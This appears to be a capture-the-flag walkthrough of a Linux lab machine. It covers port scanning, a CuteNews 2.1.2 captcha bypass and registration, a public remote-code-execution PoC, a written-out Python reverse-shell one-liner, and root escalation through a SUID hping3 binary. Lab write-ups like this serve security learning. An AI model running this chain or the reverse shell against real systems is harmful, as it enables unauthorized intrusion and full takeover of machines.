sudo nmap -p- -sS -sV                                      

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.38 ((Debian))
88/tcp  open  http     nginx 1.14.2
110/tcp open  pop3     Courier pop3d
995/tcp open  ssl/pop3 Courier pop3d
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to port 80 in the browser lands us on the default install page for Apache.

Running against the target web servers reveals index.php

python3 -u -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url

Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system.

Instead we can register ourselves as a new user to access. On the register new user page we are not able to load the captcha which stops us from proceeding:

Reviewing the source of this page shows we do have a link for captcha.php.

Viewing this will show what the current captcha should be.

Entering this into the registration field will allow us to proceed with new user creation.

We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with searchsploit shows the results below.

Searching further on Google for exploits we come across a PoC on GitHub located here:

Download the python script and the sad.gif files to the same directory. Run with the syntax shown below.

python3 <User> <Pass>

We can now run the following command to get a more usable reverse shell on a different listener:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

From here I uploaded linpeas which after executing identified the binary hping3 as having a SUID bit set. Meaning we can execute the binary with root permissions.

Then as per GTFOBins we can executed with the SUID bit to gain a root shell.

/bin/sh -p


/bin/sh -p

Last updated